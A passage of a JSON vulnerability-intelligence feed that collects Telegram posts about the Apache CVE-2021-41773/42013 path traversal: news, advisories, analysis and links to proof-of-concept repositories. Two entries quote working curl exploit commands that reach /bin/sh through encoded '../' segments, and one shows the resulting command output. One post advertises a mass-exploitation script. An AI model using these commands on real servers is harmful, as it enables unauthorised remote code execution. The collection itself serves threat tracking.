\u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 Zhone.\n@NeKaspersky", "creation_timestamp": "2022-04-14T15:17:01.000000Z"}, {"uuid": "f3f7ed7e-91d6-4e2e-a023-4257f526d4f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/cibsecurity/29998", "content": "\u274c Apache Web Server Zero-Day Exposes Sensitive Data \u274c\n\nThe open-source project has rolled out a security fix for CVE-2021-41773, for which public cyberattack exploit code is circulating.\n\n\ud83d\udcd6 Read\n\nvia \"Threat Post\".", "creation_timestamp": "2021-10-05T22:27:44.000000Z"}, {"uuid": "5cf19a7d-14ac-46ca-8a73-27ac22501ff2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/cibsecurity/30186", "content": "\u203c CVE-2021-42013 \u203c\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-07T20:34:08.000000Z"}, {"uuid": "379b941d-4a2f-4d42-9a0f-5a9375ccd2ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/reverse_dungeon/900", "content": "blasty/CVE-2021-41773\nCVE-2021-41773 playground\nLanguage: Dockerfile\nStars: 153 Issues: 1 Forks: 37\nhttps://github.com/blasty/CVE-2021-41773", "creation_timestamp": "2021-10-10T18:03:51.000000Z"}, {"uuid": "0ebf36a2-f42c-4281-907c-ba905eb37631", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/pwnwiki_zhchannel/860", "content": "RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013):\nroot@CT406:~# curl 'http://192.168.0.191/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'\nuid=1(daemon) gid=1(daemon) groups=1(daemon)", "creation_timestamp": "2021-10-08T05:00:59.000000Z"}, {"uuid": "049916d1-427c-4843-bac9-c62a778839bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/thehackernews/1572", "content": "A new urgent Apache patch update has been released for the actively exploited Path Traversal issue (CVE-2021-41773), which has now been identified as a critical remote code execution #vulnerability.\n\nDetails: https://thehackernews.com/2021/10/new-patch-released-for-actively.html", "creation_timestamp": "2021-10-08T06:54:29.000000Z"}, {"uuid": "e341eee9-02b7-490d-ae06-c16b9ea8699b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/thehackernews/1563", "content": "Apache has issued urgent security patches to address 2 new security vulnerabilities\u2014including a zero-day path traversal and file disclosure flaw (CVE-2021-41773) in HTTP servers that it said is being actively exploited in the wild.\n\nDetails: https://thehackernews.com/2021/10/apache-warns-of-zero-day-exploit-in.html", "creation_timestamp": "2021-10-05T17:09:54.000000Z"}, {"uuid": "17a7f566-2614-4219-9ef6-687db6abe408", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/xakep_ru/11408", "content": "\u0421\u0432\u0435\u0436\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Apache \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430\n\n\u0420\u0430\u043d\u0435\u0435 \u043d\u0430 \u044d\u0442\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 Apache Software Foundation \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u043f\u0430\u0442\u0447 \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-41773 \u0432 \u0441\u0432\u043e\u0435\u043c HTTP \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0435. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0443\u0436\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043f\u043e\u0434 \u0430\u0442\u0430\u043a\u0430\u043c\u0438, \u0430 \u043f\u043e\u044f\u0432\u0438\u0432\u0448\u0438\u0435\u0441\u044f \u0432 \u0441\u0435\u0442\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u044b \u0434\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442, \u0447\u0442\u043e \u0435\u0435 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430.\n\nhttps://xakep.ru/2021/10/07/apache-rce/", "creation_timestamp": "2021-10-07T17:03:47.000000Z"}, {"uuid": "399ed352-7966-4b5e-92f6-86b70407ecae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/xakep_ru/11422", "content": "\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 Apache \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b\u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u043f\u0430\u0442\u0447 \u0434\u043b\u044f \u0441\u0432\u0435\u0436\u0435\u0439 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\n\n\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 Apache \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0442\u044c 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-41773 \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0441 \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0430. \u0422\u0435\u043f\u0435\u0440\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435 \u0431\u044b\u043b \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d \u0432\u0442\u043e\u0440\u043e\u0439 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE \u0438 \u0434\u043b\u044f \u043d\u0435\u0435 \u0432\u044b\u0448\u0435\u043b \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u043f\u0430\u0442\u0447.\n\nhttps://xakep.ru/2021/10/11/cve-2021-42013/", "creation_timestamp": "2021-10-11T18:33:48.000000Z"}, {"uuid": "d3955521-3bc8-4a70-a80b-83e19dee15c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/webpwn/305", "content": "\u041d\u0435\u0434\u0430\u0432\u043d\u044f\u044f CVE-2021-41773 \u0432 Apache 2.4.49, \u044d\u0442\u043e \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u044b\u0445\u043e\u0434 \u0438\u0437 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0441 \u0447\u0442\u0435\u043d\u0438\u0435\u043c \u0444\u0430\u0439\u043b\u043e\u0432, \u043a\u0430\u043a \u043c\u043d\u043e\u0433\u0438\u0435 \u043f\u043e\u0434\u0443\u043c\u0430\u043b\u0438 \n\ncurl --data \"A=|echo;id\" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'", "creation_timestamp": "2021-10-06T11:18:40.000000Z"}, {"uuid": "b85ffb7b-952d-46ee-9691-fa7651e57881", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1227", "content": "CVE-2021\nCVE-2021-41773 Test Page &amp; Exploit Code\n\nhttps://github.com/jhye0n/CVE-2021-41773\n\n@BlueRedTeam", "creation_timestamp": "2021-11-26T07:34:27.000000Z"}, {"uuid": "3d013a25-9b83-4b18-844a-367fccf69e86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/cultofwire/997", "content": "\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e CVE \u0447\u0435\u0440\u0435\u0437 API.\n\n\u0410\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0441\u043a\u0430\u043d\u0435\u0440\u044b \u044d\u0442\u043e \u0445\u043e\u0440\u043e\u0448\u043e, \u043d\u043e false positive \u043d\u0438\u043a\u0442\u043e \u043d\u0435 \u043e\u0442\u043c\u0435\u043d\u044f\u043b. \u041f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u044d\u0442\u043e \u0432\u0441\u0451 \u043d\u0430\u0434\u043e, \u043d\u043e \u0440\u0443\u043a\u0430\u043c\u0438 \u0433\u0443\u0433\u043b\u0438\u0442\u044c \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u0434\u043e\u043b\u0433\u0438\u0439. \u0411\u0443\u0434\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0439 API.\n\n\u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0438\u043d\u0444\u0443 \u043f\u043e CVE \u0441\u043e \u0432\u0441\u0435\u043c\u0438 \u0434\u0435\u0442\u0430\u043b\u044f\u043c\u0438:\ncurl -s https://cve.circl.lu/api/cve/CVE-2021-41773 \n\n\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043f\u043e CVE, \u0432\u044b\u0432\u043e\u0434\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u0435\u0440\u0441\u0438\u0438 \u041f\u041e:\ncurl -s https://cve.circl.lu/api/cve/CVE-2021-41773 | jq \".id, .vulnerable_product\"\n\n\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043f\u043e CVE \u0438\u0437 \u0441\u043f\u0438\u0441\u043a\u0430:\ncat cve.list | xargs -I % curl -s https://cve.circl.lu/api/cve/% | jq \".id, .vulnerable_product\"\n \n\u041a\u0440\u043e\u043c\u0435 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e API \u043c\u043e\u0436\u043d\u043e \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u044c \u0441\u0432\u043e\u0439 CVE-Search c  \u043f\u0440\u0435\u0444\u0435\u0440\u0430\u043d\u0441\u043e\u043c \u0438 \u043a\u0443\u0440\u0442\u0438\u0437\u0430\u043d\u043a\u0430\u043c\u0438  Mongo \u0438 Flask.\n\u0418 \u0434\u0430\u0436\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u0434\u043b\u044f Python \u0435\u0441\u0442\u044c.\n\nP.S. \u041d\u0435 \u0443\u0434\u0430\u0451\u0442\u0441\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a CVE \u043f\u043e \u0432\u0435\u043d\u0434\u043e\u0440\u0443, \u0442\u043e\u043b\u0438 \u043b\u044b\u0436\u0438 \u043d\u0435 \u0435\u0434\u0443\u0442, \u0442\u043e\u043b\u0438 \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u043d\u0430\u0434\u043e \u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c.\n\n\u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f \u043a API \n\u041b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0439 CVE-Search \n\u0411\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 python", "creation_timestamp": "2022-04-27T20:24:01.000000Z"}, {"uuid": "b94a5163-0eb3-47d4-b4dc-e6e7d0cce0b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/5698", "content": "CVE-2021-41773: Path Traversal Zero-Day in Apache HTTP Server Exploited\n\nhttps://www.tenable.com/blog/cve-2021-41773-path-traversal-zero-day-in-apache-http-server-exploited", "creation_timestamp": "2021-10-05T23:41:42.000000Z"}, {"uuid": "8db1abec-46ba-436d-9f75-546011cc0007", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/forensictools/469", "content": "RedTeam Toolkit\n[https://github.com/signorrayan/RedTeam_toolkit]\n\nweb-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u043d\u0430 \u044f\u0437\u044b\u043a\u0435 Python (Django), \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0435\u0435 \u043d\u0430\u0431\u043e\u0440 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 red-team \u0434\u043b\u044f \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439. \u0412 \u043e\u0441\u043d\u043e\u0432\u0435 \u043b\u0435\u0436\u0430\u0442 \u0442\u0430\u043a\u0438\u0435 \u043f\u0440\u043e\u0435\u043a\u0442\u044b, \u043a\u0430\u043a nmap, rustscan, dirsearch, shreder, circl, crowbar \u0438 \u0442.\u0434.\n\n\u2022 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u0440\u0442\u043e\u0432 \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0446\u0435\u043b\u0438\n\u2022 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0432\u0441\u0435\u0445 \u0436\u0438\u0432\u044b\u0445 \u0445\u043e\u0441\u0442\u043e\u0432 \u0432 \u043f\u043e\u0434\u0441\u0435\u0442\u0438\n\u2022 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0432\u0441\u0435\u0445 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432 \u0446\u0435\u043b\u0438\n\u2022 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 CVE \u043f\u043e CveID\n\u2022 \u0430\u0442\u0430\u043a\u0430 \u043f\u043e \u0441\u043b\u043e\u0432\u0430\u0440\u044e SSH\n\u2022 RDP BruteForce\n\u2022 \u0440\u0430\u0437\u0434\u0435\u043b WebApps: Apache Path Traversal PoC (CVE-2021-41773), \u0412\u0435\u0431-\u043a\u0440\u0430\u0443\u043b\u0435\u0440 \u0434\u043b\u044f \u0441\u0431\u043e\u0440\u0430 URL-\u0430\u0434\u0440\u0435\u0441\u043e\u0432, \u041f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u0438\u0435 \u0441\u0443\u0431\u0434\u043e\u043c\u0435\u043d\u043e\u0432\n\u2022 \u0440\u0430\u0437\u0434\u0435\u043b Windows (\u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0435\u0442\u0441\u044f, \u0434\u0440\u0443\u0433\u0438\u0435 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 CVE \u0431\u0443\u0434\u0443\u0442 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u044b): Microsoft Exchange ProxyShell PoC (CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)\n\u2022 \u0440\u0430\u0437\u0434\u0435\u043b Linux \u0434\u043b\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 CVE \u0432 Linux \u0442\u0430\u043a\u0436\u0435 \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f\n\n#pentest #python #redteam #vulns", "creation_timestamp": "2021-11-29T11:51:06.000000Z"}, {"uuid": "1f3fcf1f-d54d-4c57-8c60-b0cabed843cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/hackingtoolsprvi8/2161", "content": "\ud83c\udf0e Mass Cve 2021-41773 \ud83d\udc93\n\nThis exploit Apache HTTP Server 2.4.49 (2021)\n\npath traversal and file disclosure vulnerability in Apache HTTP Server\n\nPython Version : Python3\n\nUsage :\npython3 -m pip install requests\npyyhon3 cve-2021-41773.py sitelist.txt 50\n\nresults will be automatically saved in vuln.txt\n\nLink Download : HERE", "creation_timestamp": "2022-05-14T22:40:54.000000Z"}, {"uuid": "3682ed11-da34-4e05-8d64-026a356263ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/arvin_club/4888", "content": "https://github.com/Balgogan/CVE-2021-41773", "creation_timestamp": "2021-11-11T18:58:08.000000Z"}, {"uuid": "ebfe29b2-68a7-432b-9794-c6c2a92cc3d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "Telegram/9V4O5GyR-stJQC0BWlKyuz-Z5W_SuVUFieTI2mu8GO0G59d6", "content": "", "creation_timestamp": "2021-10-16T21:13:17.000000Z"}, {"uuid": "b7458988-38ec-48c4-a6c5-6a418c152547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/wwcYJfnnFRfwXhRTNZswnyr2qX5jmE63v09EPyapGsLqAlda", "content": "", "creation_timestamp": "2021-10-17T11:42:49.000000Z"}, {"uuid": "d51fcdfc-1581-492d-9423-659a773e9d9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/secinfosex/41", "content": "CVE-2021-41773: Apache 2.4.49 Path Traversal\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u0439\u0442\u0438 \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0432\u0435\u0431\u0441\u0430\u0439\u0442\u0430 \u0438 \u0431\u0435\u0437 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0441\u0447\u0438\u0442\u0430\u0442\u044c, \u043d\u0443 \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, /etc/passwd\n\n\u041a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u0440\u0438\u0432\u0435\u043b \u043e\u0431\u044b\u0447\u043d\u044b\u0439 \u0440\u0435\u0444\u0430\u043a\u0442\u043e\u0440\u0438\u043d\u0433 - \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 2.4.49 \u0440\u0435\u0448\u0438\u043b\u0438 \u0443\u043d\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u0440\u043e\u0441\u0442\u044b\u043d\u044e \u0441 \u043d\u043e\u0440\u043c\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0435\u0439 \u043f\u0443\u0442\u0438, \u0438 \u0432\u044b\u043d\u0435\u0441\u043b\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0443 \u0432 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u044e ap_normalize_path. \n\n\u0412 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0441 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u043e\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u0441\u0438\u043c\u0432\u043e\u043b\u0430 '.' \u0432 \u043f\u0443\u0442\u0438 \u0438 \u0437\u0430\u043a\u0440\u0430\u043b\u0441\u044f \u0431\u0430\u0433 \u0432 571 \u0441\u0442\u0440\u043e\u043a\u0435 - \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0438\u0441\u0442 \u043d\u0435 \u0443\u0447\u0435\u043b, \u0447\u0442\u043e \u0432 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 \u0435\u0449\u0435 \u043d\u0435 \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u0435\u043b url decode. \n\n\u0412 \u0438\u0442\u043e\u0433\u0435 \u0432\u043e\u0437\u043d\u0438\u043a\u043b\u0430 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f, \u043a\u043e\u0433\u0434\u0430 \u0432\u0441\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043d\u0430 \u043e\u0431\u0445\u043e\u0434 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430 \u0447\u0435\u0440\u0435\u0437 %2e%2e \u043f\u043e\u043f\u0430\u043b\u0438 \u0432 \u0443\u0441\u043b\u043e\u0432\u0438\u0435, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043d\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u043b\u043e\u0441\u044c, \u0438 \u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u043f\u043e \u043d\u043e\u0440\u043c\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0443\u0442\u0438 ap_normalize_path, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438 \u0434\u043e\u043b\u0436\u043d\u0430 \u0441\u0440\u0435\u0437\u0430\u0442\u044c \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438 \u0432\u0440\u043e\u0434\u0435 ../, \u0441\u0442\u0430\u043b\u0430 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0442\u044c \u043d\u0435\u043d\u043e\u0440\u043c\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0443\u0442\u044c.", "creation_timestamp": "2021-10-05T18:58:14.000000Z"}, {"uuid": "175523fc-cde7-4daf-ad35-ab84e3a5487d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/arvin_club/4735", "content": "\u062f\u0631 \u0627\u0633\u0631\u0639 \u0648\u0642\u062a \u0648\u0628 \u0633\u0631\u0648\u0631 \u0622\u067e\u0627\u0686\u06cc \u0631\u0648 \u0628\u0631\u0648\u0632 \u06a9\u0646\u06cc\u062f\nhttps://httpd.apache.org/security/vulnerabilities_24.html\n\nhttps://github.com/creadpag/CVE-2021-41773-POC//", "creation_timestamp": "2021-10-08T14:54:33.000000Z"}, {"uuid": "d3f02bf4-edf3-489c-8cda-d094e1804ff0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/gpOUF48JYpPbayv82hDEIKK44R-nqK7VlljkxTI4D0eq459K", "content": "", "creation_timestamp": "2021-10-06T15:42:18.000000Z"}, {"uuid": "914c46ed-3e21-4b88-8a45-b11035a27ab2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4454", "content": "#exploit\n1. CVE-2021-39239:\nA vulnerability in XML processing in Apache Jena &lt;4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server\nhttps://github.com/AKIA27TACKEDYE76PUGU/CVE-2021-39239\n\n2. CVE-2021-24620:\nRCE in WordPress Simple Ecomm. Shopping Cart &lt;2.2.5\nhttps://github.com/AKIA27TACKEDYE76PUGU/CVE-2021-24620\n\n3. CVE-2021-41773:\nApache 2.4.49 Path Traversal\nhttps://github.com/numanturle/CVE-2021-41773\nhttps://github.com/habibiefaried/CVE-2021-41773-PoC", "creation_timestamp": "2024-05-14T02:35:13.000000Z"}, {"uuid": "dce97f88-602a-4d40-bda9-032dae6f60df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/4637", "content": "#Threat_Research\n1. Apache HTTP Server CVE-2021-42013, CVE-2021-41773 Exploited in the Wild\nhttps://blogs.juniper.net/en-us/threat-research/apache-http-server-cve-2021-42013-and-cve-2021-41773-exploited\n2. CVE-2021-39341:\nA vulnerability in the the OptinMonster plugin\nhttps://www.wordfence.com/blog/2021/10/1000000-sites-affected-by-optinmonster-vulnerabilities", "creation_timestamp": "2021-10-31T16:24:28.000000Z"}, {"uuid": "b1aed2b9-f513-4b91-9582-fbcb26f8f519", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4701", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (Oct 1-31)\nCVE-2021-41773 - Apache 2.4.49 Path Traversal\nhttps://t.me/cybersecuritytechnologies/4454\nCVE-2021-26084 - Confluence Server Webwork OGNL 